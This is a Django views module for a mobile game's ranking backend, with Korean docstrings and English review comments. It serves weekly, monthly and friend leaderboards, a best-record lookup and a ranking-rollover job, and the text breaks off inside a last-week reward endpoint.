from django.http import HttpResponse
from Ranking.models import *
from ShopData.models import *
from users.models import UserData
from users.models import FriendData
from GameData.models import MoneyData
from GameData.models import ItemData
from MessageData.models import TokenReceiveData
from datetime import datetime, timedelta
from django.db.models import Q
import myUtil
# Ranking reset check.
"""
호출 값
"""
@csrf_exempt
def InitRankCheck(request):
    """Rolls the weekly/monthly ranking tables over once their reset time passes.

    NOTE(review): the unconditional return directly below short-circuits the
    whole view, so every line after it is unreachable dead code -- presumably
    a deliberate kill switch for the rollover job; confirm before removing.
    """
    return HttpResponse('', content_type='application/json')
    # Result handling (unreachable -- see note above).
    # Friend weekly ranking.
    rankdata = list(RankInfoData.objects.filter(FriendInitTime__lt = datetime.today())[0:1])
    if len(rankdata) > 0:
        rankdata = rankdata[0]
        # # Infinite mode (friend rollover disabled).
        # InfiniteWeekList = list(InfiniteFriendWeekRankData.objects.order_by('-Score'))
        # InfiniteFriendLastWeekRankData.objects.all().delete()
        # cnt = 1
        # for data in InfiniteWeekList:
        # rank = InfiniteFriendLastWeekRankData()
        # rank.UserSN = data.UserSN
        # rank.Score = data.Score
        # rank.Confirm = False
        # rank.save()
        # cnt = cnt + 1
        # InfiniteFriendWeekRankData.objects.all().update(Score = 0)
        # # Time attack (friend rollover disabled).
        # TimeAttackWeekList = list(TimeAttackFriendWeekRankData.objects.order_by('-Score'))
        # TimeAttackFriendLastWeekRankData.objects.all().delete()
        # cnt = 1
        # for data in TimeAttackWeekList:
        # rank = TimeAttackFriendLastWeekRankData()
        # rank.UserSN = data.UserSN
        # rank.Score = data.Score
        # rank.Confirm = False
        # rank.save()
        # cnt = cnt + 1
        # TimeAttackFriendWeekRankData.objects.all().update(Score = 0)
        # Push the next friend reset one week into the future.
        rankdata.FriendInitTime = rankdata.FriendInitTime + timedelta(days=7)
        rankdata.save()
    # Weekly ranking.
    rankdata = list(RankInfoData.objects.filter(WeekInitTime__lt = datetime.today())[0:1])
    if len(rankdata) > 0:
        rankdata = rankdata[0]
        # Infinite mode: archive this week's rows, then zero the live scores.
        InfiniteWeekList = list(InfiniteWeekRankData.objects.order_by('-Score'))
        InfiniteLastWeekRankData.objects.all().delete()
        cnt = 1
        for data in InfiniteWeekList:
            rank = InfiniteLastWeekRankData()
            rank.UserSN = data.UserSN
            rank.Score = data.Score
            rank.Confirm = False
            rank.save()
            # cnt is incremented but never read -- vestigial rank counter.
            cnt = cnt + 1
        InfiniteWeekRankData.objects.all().update(Score = 0)
        # Time attack: same archive-and-reset cycle.
        TimeAttackWeekList = list(TimeAttackWeekRankData.objects.order_by('-Score'))
        TimeAttackLastWeekRankData.objects.all().delete()
        cnt = 1
        for data in TimeAttackWeekList:
            rank = TimeAttackLastWeekRankData()
            rank.UserSN = data.UserSN
            rank.Score = data.Score
            rank.Confirm = False
            rank.save()
            cnt = cnt + 1
        TimeAttackWeekRankData.objects.all().update(Score = 0)
        # Push the next weekly reset one week into the future.
        rankdata.WeekInitTime = rankdata.WeekInitTime + timedelta(days=7)
        rankdata.save()
    # Monthly ranking.
    rankdata = list(RankInfoData.objects.filter(MonthInitTime__lt = datetime.today())[0:1])
    if len(rankdata) > 0:
        rankdata = rankdata[0]
        # Infinite mode: archive this month's rows, then zero the live scores.
        InfiniteMonthList = list(InfiniteMonthRankData.objects.order_by('-Score'))
        InfiniteLastMonthRankData.objects.all().delete()
        cnt = 1
        for data in InfiniteMonthList:
            rank = InfiniteLastMonthRankData()
            rank.UserSN = data.UserSN
            rank.Score = data.Score
            rank.Confirm = False
            rank.save()
            cnt = cnt + 1
        InfiniteMonthRankData.objects.all().update(Score = 0)
        # Time attack: same archive-and-reset cycle.
        TimeAttackMonthList = list(TimeAttackMonthRankData.objects.order_by('-Score'))
        TimeAttackLastMonthRankData.objects.all().delete()
        cnt = 1
        for data in TimeAttackMonthList:
            rank = TimeAttackLastMonthRankData()
            rank.UserSN = data.UserSN
            rank.Score = data.Score
            rank.Confirm = False
            rank.save()
            cnt = cnt + 1
        TimeAttackMonthRankData.objects.all().update(Score = 0)
        # Advance the reset timestamp to the 1st of the next month,
        # preserving the configured time of day.
        year = rankdata.MonthInitTime.year
        month = rankdata.MonthInitTime.month
        if rankdata.MonthInitTime.month == 12:
            year = year + 1
            month = 1
        else:
            month = month + 1
        rankdata.MonthInitTime = datetime(year, month, 1, rankdata.MonthInitTime.hour, rankdata.MonthInitTime.minute, rankdata.MonthInitTime.second)
        rankdata.save()
    return HttpResponse('', content_type='application/json')
#
#-------------------------------------------------------------------------------
# Fetch the user's career best-record data.
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
# 무한모드 랭킹 1등 횟수.
InfiniteModeRank_1
# 무한모드 랭킹 2등 횟수.
InfiniteModeRank_2
# 무한모드 랭킹 3등 횟수.
InfiniteModeRank_3
# 타임어택 랭킹 1등 횟수.
TimeAttackModeRank_1
# 타임어택 랭킹 2등 횟수.
TimeAttackModeRank_2
# 타임어택 랭킹 3등 횟수.
TimeAttackModeRank_3
"""
@csrf_exempt
def BestRecodDataResponse(request):
    """Returns the caller's best-record counters (rank 1-3 finish counts
    per game mode), or an empty body when no record row exists.

    POST params: SN (user serial number), Auth (authentication token).
    """
    def _json(payload):
        # All responses share the same JSON envelope.
        return HttpResponse(myUtil.JsonPaser(payload), content_type='application/json')

    # Argument validation.
    if request.method == 'GET':
        return _json({'ErrorCode' : '99', 'Message' : 'error'})
    if not request.POST.get('SN'):
        return _json({'ErrorCode' : '101', 'Message' : 'SN does not exist'})
    elif not request.POST.get('Auth'):
        return _json({'ErrorCode' : '102', 'Message' : 'Auth does not exist'})
    user = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(user) == 0:
        return _json({'ErrorCode' : '103', 'Message' : 'UserData does not exist'})
    user = user[0]
    if user.Auth != request.POST.get('Auth'):
        return _json({'ErrorCode' : '104', 'Message' : 'Auth is invalid.'})
    # Result handling.
    dataList = list(BestRecodData.objects.filter(UserSN = request.POST.get('SN')))
    if len(dataList) == 0:
        return HttpResponse('', content_type='application/json')
    record = dataList[0]
    SendData = {
        'InfiniteModeRank_1' : record.InfiniteModeRank_1,
        'InfiniteModeRank_2' : record.InfiniteModeRank_2,
        'InfiniteModeRank_3' : record.InfiniteModeRank_3,
        'TimeAttackModeRank_1' : record.TimeAttackModeRank_1,
        'TimeAttackModeRank_2' : record.TimeAttackModeRank_2,
        'TimeAttackModeRank_3' : record.TimeAttackModeRank_3,
    }
    return _json(SendData)
#-------------------------------------------------------------------------------
# Infinite-mode friend weekly ranking
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
S_No = 시작위치.
E_No = 끝위치.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['PetSN'] = rankData.PetSN
data['VehicleSN'] = rankData.VehicleSN
data['IsReceive'] = True
data['ReceiveTime'] = 0
임시추가..
data['UserName'] = 유저이름.
data['PictureURL'] = 유저 사진url
"""
@csrf_exempt
def FriendInfiniteWeekRankResponse(request):
    """Infinite-mode weekly ranking restricted to the caller's friends.

    POST params:
        SN   -- requesting user's serial number.
        Auth -- authentication token.
        S_No -- start index of the ranking slice.
        E_No -- end index of the ranking slice.
    Returns a JSON list of rank rows (UserSN, Rank, Score, equipment SNs,
    token-receive state, UserName, PictureURL).
    """
    # Argument validation.
    if request.method == 'GET':
        data = {
            'ErrorCode' : '99',
            'Message' : 'error',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    if not request.POST.get('SN'):
        data = {
            'ErrorCode' : '101',
            'Message' : 'SN does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('Auth'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'Auth does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('S_No'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'S_No does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('E_No'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'E_No does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(user) == 0:
        data = {
            'ErrorCode' : '103',
            'Message' : 'UserData does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = user[0]
    if user.Auth != request.POST.get('Auth'):
        data = {
            'ErrorCode' : '104',
            'Message' : 'Auth is invalid.',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # Result handling.
    friendList = []
    friendRankList = []
    for friendData in list(FriendData.objects.filter(UserSN = request.POST.get('SN'))):
        friendList.append(friendData.FriendSN)
    # Renamed from min/max so the builtins are not shadowed.
    start_no = int(request.POST.get('S_No'))
    end_no = int(request.POST.get('E_No'))
    cnt = start_no
    for rankData in list(InfiniteFriendWeekRankData.objects.order_by('-Score')[start_no : end_no]):
        if rankData.UserSN in friendList or rankData.UserSN == int(request.POST.get('SN')):
            # NOTE(review): both UserSN and SendUserSN are filtered with
            # rankData.UserSN (sender == receiver); the requester's SN may
            # have been intended for one of them -- confirm before changing.
            tokenReceive = list(TokenReceiveData.objects.filter(UserSN = rankData.UserSN, SendUserSN = rankData.UserSN))
            userData = list(UserData.objects.filter(id = rankData.UserSN))
            cnt = cnt + 1
            data = {}
            data['UserSN'] = rankData.UserSN
            data['Rank'] = cnt
            data['Score'] = rankData.Score
            data['CharacterSN'] = rankData.CharacterSN
            data['Pet1SN'] = rankData.Pet1SN
            data['Pet2SN'] = rankData.Pet2SN
            data['VehicleSN'] = rankData.VehicleSN
            if len(tokenReceive) > 0:
                data['IsReceive'] = tokenReceive[0].IsReceive
                data['ReceiveTime'] = myUtil.ToSecRemaining(tokenReceive[0].ReceiveTime)
            else:
                # No pending token: treat as already received.
                data['IsReceive'] = True
                data['ReceiveTime'] = 0
            if len(userData) > 0:
                data['UserName'] = myUtil.encodeStr(userData[0].UserName)
                data['PictureURL'] = userData[0].PictureURL
            friendRankList.append(data)
    return HttpResponse(myUtil.JsonPaser(friendRankList), content_type='application/json')
#-------------------------------------------------------------------------------
# 타임어택 친구 주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
S_No = 시작위치.
E_No = 끝위치.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['PetSN'] = rankData.PetSN
data['VehicleSN'] = rankData.VehicleSN
임시추가..
data['UserName'] = 유저이름.
data['PictureURL'] = 유저 사진url
"""
@csrf_exempt
def FriendTimeAttackWeekRankResponse(request):
    """Time-attack weekly ranking restricted to the caller's friends.

    POST params:
        SN   -- requesting user's serial number.
        Auth -- authentication token.
        S_No -- start index of the ranking slice.
        E_No -- end index of the ranking slice.
    Returns a JSON list of rank rows (UserSN, Rank, Score, equipment SNs,
    token-receive state, UserName, PictureURL).
    """
    # Argument validation.
    if request.method == 'GET':
        data = {
            'ErrorCode' : '99',
            'Message' : 'error',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    if not request.POST.get('SN'):
        data = {
            'ErrorCode' : '101',
            'Message' : 'SN does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('Auth'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'Auth does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('S_No'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'S_No does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('E_No'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'E_No does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(user) == 0:
        data = {
            'ErrorCode' : '103',
            'Message' : 'UserData does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = user[0]
    if user.Auth != request.POST.get('Auth'):
        data = {
            'ErrorCode' : '104',
            'Message' : 'Auth is invalid.',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # Result handling.
    friendList = []
    friendRankList = []
    for friendData in list(FriendData.objects.filter(UserSN = request.POST.get('SN'))):
        friendList.append(friendData.FriendSN)
    # Renamed from min/max so the builtins are not shadowed.
    start_no = int(request.POST.get('S_No'))
    end_no = int(request.POST.get('E_No'))
    cnt = start_no
    for rankData in list(TimeAttackFriendWeekRankData.objects.order_by('-Score')[start_no : end_no]):
        # Normalised from str(rankData.UserSN) == request.POST.get('SN') to
        # the integer comparison every sibling endpoint uses, so non-canonical
        # numerals (e.g. '007') behave consistently.
        if rankData.UserSN in friendList or rankData.UserSN == int(request.POST.get('SN')):
            # NOTE(review): both UserSN and SendUserSN are filtered with
            # rankData.UserSN (sender == receiver); the requester's SN may
            # have been intended for one of them -- confirm before changing.
            tokenReceive = list(TokenReceiveData.objects.filter(UserSN = rankData.UserSN, SendUserSN = rankData.UserSN))
            userData = list(UserData.objects.filter(id = rankData.UserSN))
            cnt = cnt + 1
            data = {}
            data['UserSN'] = rankData.UserSN
            data['Rank'] = cnt
            data['Score'] = rankData.Score
            data['CharacterSN'] = rankData.CharacterSN
            data['Pet1SN'] = rankData.Pet1SN
            data['Pet2SN'] = rankData.Pet2SN
            data['VehicleSN'] = rankData.VehicleSN
            if len(tokenReceive) > 0:
                data['IsReceive'] = tokenReceive[0].IsReceive
                data['ReceiveTime'] = myUtil.ToSecRemaining(tokenReceive[0].ReceiveTime)
            else:
                # No pending token: treat as already received.
                data['IsReceive'] = True
                data['ReceiveTime'] = 0
            if len(userData) > 0:
                data['UserName'] = myUtil.encodeStr(userData[0].UserName)
                data['PictureURL'] = userData[0].PictureURL
            friendRankList.append(data)
    return HttpResponse(myUtil.JsonPaser(friendRankList), content_type='application/json')
#-------------------------------------------------------------------------------
# 무한모드 주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
S_No = 시작위치.
E_No = 끝위치.
리턴값
MyRank = 내랭킹 데이터.
RankData = 랭킹데이터..
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['PetSN'] = rankData.PetSN
data['VehicleSN'] = rankData.VehicleSN
임시추가..
data['UserName'] = 유저이름.
data['PictureURL'] = 유저 사진url
"""
@csrf_exempt
def InfiniteWeekRankResponse(request):
    """Global infinite-mode weekly ranking (top 30) plus the caller's row.

    POST params:
        SN   -- requesting user's serial number.
        Auth -- authentication token.
        S_No / E_No -- validated but currently ignored (slice pinned to 0..30).
    Returns MyRank (the caller's row, when in the slice), RankData (list of
    rows) and MyPercent.
    """
    # Argument validation.
    if request.method == 'GET':
        data = {
            'ErrorCode' : '99',
            'Message' : 'error',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    if not request.POST.get('SN'):
        data = {
            'ErrorCode' : '101',
            'Message' : 'SN does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('Auth'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'Auth does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('S_No'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'S_No does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('E_No'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'E_No does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(user) == 0:
        data = {
            'ErrorCode' : '103',
            'Message' : 'UserData does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = user[0]
    if user.Auth != request.POST.get('Auth'):
        data = {
            'ErrorCode' : '104',
            'Message' : 'Auth is invalid.',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # Result handling.
    SendData = {}
    RankList = []
    # S_No/E_No are validated above but deliberately ignored: the slice is
    # pinned to the top 30 rows. TODO confirm this hard-coding is intended.
    # (Renamed from min/max so the builtins are not shadowed.)
    start_no = 0
    end_no = 30
    cnt = start_no
    myRank = 0
    # Positive scores only (or the caller's own row), capped below the
    # 1,000,000 sentinel.
    for rankData in list(InfiniteWeekRankData.objects.filter(
            (Q(Score__gt = 0) | Q(UserSN = user.id)) & Q(Score__lt = 1000000)
            ).order_by('-Score')[start_no : end_no]):
        userData = list(UserData.objects.filter(id = rankData.UserSN))
        cnt = cnt + 1
        data = {}
        data['UserSN'] = rankData.UserSN
        data['Rank'] = cnt
        data['Score'] = rankData.Score
        data['CharacterSN'] = rankData.CharacterSN
        data['Pet1SN'] = rankData.Pet1SN
        data['Pet2SN'] = rankData.Pet2SN
        data['VehicleSN'] = rankData.VehicleSN
        if len(userData) > 0:
            data['UserName'] = myUtil.encodeStr(userData[0].UserName)
            data['PictureURL'] = userData[0].PictureURL
        else:
            # Skip ranking rows whose user record is gone (still consumes a
            # rank number, matching the original behaviour).
            continue
        RankList.append(data)
        if rankData.UserSN == int(request.POST.get('SN')):
            SendData['MyRank'] = data
            myRank = cnt
    SendData['RankData'] = RankList
    # Guard against an empty ranking (ZeroDivisionError in the original) and
    # force true division so the percentage is meaningful under Python 2 too.
    SendData['MyPercent'] = int(myRank * 100.0 / cnt) if cnt > 0 else 0
    return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 타임어택 주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
S_No = 시작위치.
E_No = 끝위치.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['PetSN'] = rankData.PetSN
data['VehicleSN'] = rankData.VehicleSN
"""
@csrf_exempt
def TimeAttackWeekRankResponse(request):
    """Global time-attack weekly ranking slice plus the caller's row.

    POST params:
        SN   -- requesting user's serial number.
        Auth -- authentication token.
        S_No -- start index of the ranking slice.
        E_No -- end index of the ranking slice.
    Returns MyRank (when the caller is in the slice), RankData and MyPercent.
    """
    # Argument validation.
    if request.method == 'GET':
        data = {
            'ErrorCode' : '99',
            'Message' : 'error',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    if not request.POST.get('SN'):
        data = {
            'ErrorCode' : '101',
            'Message' : 'SN does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('Auth'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'Auth does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # S_No/E_No were used below without validation (a missing parameter made
    # int(None) raise a 500); validate them like the sibling endpoints do.
    elif not request.POST.get('S_No'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'S_No does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('E_No'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'E_No does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(user) == 0:
        data = {
            'ErrorCode' : '103',
            'Message' : 'UserData does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = user[0]
    if user.Auth != request.POST.get('Auth'):
        data = {
            'ErrorCode' : '104',
            'Message' : 'Auth is invalid.',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # Result handling.
    SendData = {}
    RankList = []
    # Renamed from min/max so the builtins are not shadowed.
    start_no = int(request.POST.get('S_No'))
    end_no = int(request.POST.get('E_No'))
    cnt = start_no
    myRank = 0
    for rankData in list(TimeAttackWeekRankData.objects.order_by('-Score')[start_no : end_no]):
        userData = list(UserData.objects.filter(id = rankData.UserSN))
        cnt = cnt + 1
        data = {}
        data['UserSN'] = rankData.UserSN
        data['Rank'] = cnt
        data['Score'] = rankData.Score
        data['CharacterSN'] = rankData.CharacterSN
        data['Pet1SN'] = rankData.Pet1SN
        data['Pet2SN'] = rankData.Pet2SN
        data['VehicleSN'] = rankData.VehicleSN
        if len(userData) > 0:
            data['UserName'] = myUtil.encodeStr(userData[0].UserName)
            data['PictureURL'] = userData[0].PictureURL
        RankList.append(data)
        if rankData.UserSN == int(request.POST.get('SN')):
            SendData['MyRank'] = data
            myRank = cnt
    SendData['RankData'] = RankList
    # Guard against cnt == 0 (ZeroDivisionError in the original) and force
    # true division so the percentage is meaningful under Python 2 too.
    SendData['MyPercent'] = int(myRank * 100.0 / cnt) if cnt > 0 else 0
    return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 무한모드 월간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
S_No = 시작위치.
E_No = 끝위치.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['PetSN'] = rankData.PetSN
data['VehicleSN'] = rankData.VehicleSN
"""
@csrf_exempt
def InfiniteMonthRankResponse(request):
    """Global infinite-mode monthly ranking (top 30) plus the caller's row.

    POST params:
        SN   -- requesting user's serial number.
        Auth -- authentication token.
    Returns MyRank (when the caller is in the slice), RankData and MyPercent.
    """
    # Argument validation.
    if request.method == 'GET':
        data = {
            'ErrorCode' : '99',
            'Message' : 'error',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    if not request.POST.get('SN'):
        data = {
            'ErrorCode' : '101',
            'Message' : 'SN does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('Auth'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'Auth does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(user) == 0:
        data = {
            'ErrorCode' : '103',
            'Message' : 'UserData does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = user[0]
    if user.Auth != request.POST.get('Auth'):
        data = {
            'ErrorCode' : '104',
            'Message' : 'Auth is invalid.',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # Result handling.
    SendData = {}
    RankList = []
    # The original parsed S_No/E_No here and immediately overwrote the values
    # with 0/30 -- dead code that raised when either parameter was absent
    # (this endpoint never validates them). The slice stays pinned to the
    # top 30 rows; the crashing parse is removed.
    start_no = 0
    end_no = 30
    cnt = start_no
    myRank = 0
    # Positive scores only (or the caller's own row), capped below the
    # 1,000,000 sentinel.
    for rankData in list(InfiniteMonthRankData.objects.filter(
            (Q(Score__gt = 0) | Q(UserSN = user.id)) & Q(Score__lt = 1000000)
            ).order_by('-Score')[start_no : end_no]):
        userData = list(UserData.objects.filter(id = rankData.UserSN))
        cnt = cnt + 1
        data = {}
        data['UserSN'] = rankData.UserSN
        data['Rank'] = cnt
        data['Score'] = rankData.Score
        data['CharacterSN'] = rankData.CharacterSN
        data['Pet1SN'] = rankData.Pet1SN
        data['Pet2SN'] = rankData.Pet2SN
        data['VehicleSN'] = rankData.VehicleSN
        if len(userData) > 0:
            data['UserName'] = myUtil.encodeStr(userData[0].UserName)
            data['PictureURL'] = userData[0].PictureURL
        else:
            # Skip ranking rows whose user record is gone (still consumes a
            # rank number, matching the original behaviour).
            continue
        RankList.append(data)
        if rankData.UserSN == int(request.POST.get('SN')):
            SendData['MyRank'] = data
            myRank = cnt
    SendData['RankData'] = RankList
    # Guard against an empty ranking (ZeroDivisionError in the original) and
    # force true division so the percentage is meaningful under Python 2 too.
    SendData['MyPercent'] = int(myRank * 100.0 / cnt) if cnt > 0 else 0
    return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 타임어택 월간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
S_No = 시작위치.
E_No = 끝위치.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['PetSN'] = rankData.PetSN
data['VehicleSN'] = rankData.VehicleSN
"""
@csrf_exempt
def TimeAttackMonthRankResponse(request):
    """Global time-attack monthly ranking slice plus the caller's row.

    POST params:
        SN   -- requesting user's serial number.
        Auth -- authentication token.
        S_No -- start index of the ranking slice.
        E_No -- end index of the ranking slice.
    Returns MyRank (when the caller is in the slice), RankData and MyPercent.
    """
    # Argument validation.
    if request.method == 'GET':
        data = {
            'ErrorCode' : '99',
            'Message' : 'error',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    if not request.POST.get('SN'):
        data = {
            'ErrorCode' : '101',
            'Message' : 'SN does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('Auth'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'Auth does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # S_No/E_No were used below without validation (a missing parameter made
    # int(None) raise a 500); validate them like the sibling endpoints do.
    elif not request.POST.get('S_No'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'S_No does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('E_No'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'E_No does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(user) == 0:
        data = {
            'ErrorCode' : '103',
            'Message' : 'UserData does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = user[0]
    if user.Auth != request.POST.get('Auth'):
        data = {
            'ErrorCode' : '104',
            'Message' : 'Auth is invalid.',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # Result handling.
    SendData = {}
    RankList = []
    # Renamed from min/max so the builtins are not shadowed.
    start_no = int(request.POST.get('S_No'))
    end_no = int(request.POST.get('E_No'))
    cnt = start_no
    myRank = 0
    for rankData in list(TimeAttackMonthRankData.objects.order_by('-Score')[start_no : end_no]):
        userData = list(UserData.objects.filter(id = rankData.UserSN))
        cnt = cnt + 1
        data = {}
        data['UserSN'] = rankData.UserSN
        data['Rank'] = cnt
        data['Score'] = rankData.Score
        data['CharacterSN'] = rankData.CharacterSN
        data['Pet1SN'] = rankData.Pet1SN
        data['Pet2SN'] = rankData.Pet2SN
        data['VehicleSN'] = rankData.VehicleSN
        if len(userData) > 0:
            data['UserName'] = myUtil.encodeStr(userData[0].UserName)
            data['PictureURL'] = userData[0].PictureURL
        RankList.append(data)
        if rankData.UserSN == int(request.POST.get('SN')):
            SendData['MyRank'] = data
            myRank = cnt
    SendData['RankData'] = RankList
    # Guard against cnt == 0 (ZeroDivisionError in the original) and force
    # true division so the percentage is meaningful under Python 2 too.
    SendData['MyPercent'] = int(myRank * 100.0 / cnt) if cnt > 0 else 0
    return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 무한모드 친구 전주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
MyRank = 내랭킹
RewardData
- Type = 1 : 골드, 2 : 캐쉬, 3 : 아이템.
- ItemSN = 아이템SN.
- Value = 수량.
RankData
- UserSN = 유저 번호.
- Rank = 랭킹.
- Score = 점수.
- UserName = 유저 이름.
- PictureURL = 사진URL.
"""
@csrf_exempt
def FriendInfiniteLastWeekRankResponse(request):
    """Last week's infinite-mode friend ranking, with one-time reward payout.

    POST params: SN (user serial number), Auth (authentication token).
    Returns MyRank, RewardData (Type 1=gold, 2=cash, 3=item; ItemSN; Value)
    and RankData rows -- or an empty body once the result was already viewed.
    """
    # Argument validation.
    if request.method == 'GET':
        data = {
            'ErrorCode' : '99',
            'Message' : 'error',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    if not request.POST.get('SN'):
        data = {
            'ErrorCode' : '101',
            'Message' : 'SN does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('Auth'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'Auth does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(user) == 0:
        data = {
            'ErrorCode' : '103',
            'Message' : 'UserData does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = user[0]
    if user.Auth != request.POST.get('Auth'):
        data = {
            'ErrorCode' : '104',
            'Message' : 'Auth is invalid.',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # Result handling.
    # Has the ranking already been confirmed (viewed)?
    confirmData = list(InfiniteFriendLastWeekRankData.objects.filter(UserSN = request.POST.get('SN')))
    if len(confirmData) == 0 or confirmData[0].Confirm == True:
        return HttpResponse('', content_type='application/json')
    # Mark as confirmed immediately so the reward is paid out only once.
    confirmData[0].Confirm = True
    confirmData[0].save()
    friendList = []
    friendRankList = []
    SendData = {}
    RewardData = []
    RewardList = []
    for friendData in list(FriendData.objects.filter(UserSN = request.POST.get('SN'))):
        friendList.append(friendData.FriendSN)
    cnt = 1
    # Walk the full last-week table, keeping only friends and the requester.
    for rankData in list(InfiniteFriendLastWeekRankData.objects.order_by('-Score')):
        if rankData.UserSN in friendList or rankData.UserSN == int(request.POST.get('SN')):
            userData = list(UserData.objects.filter(id = rankData.UserSN))
            data = {}
            data['UserSN'] = rankData.UserSN
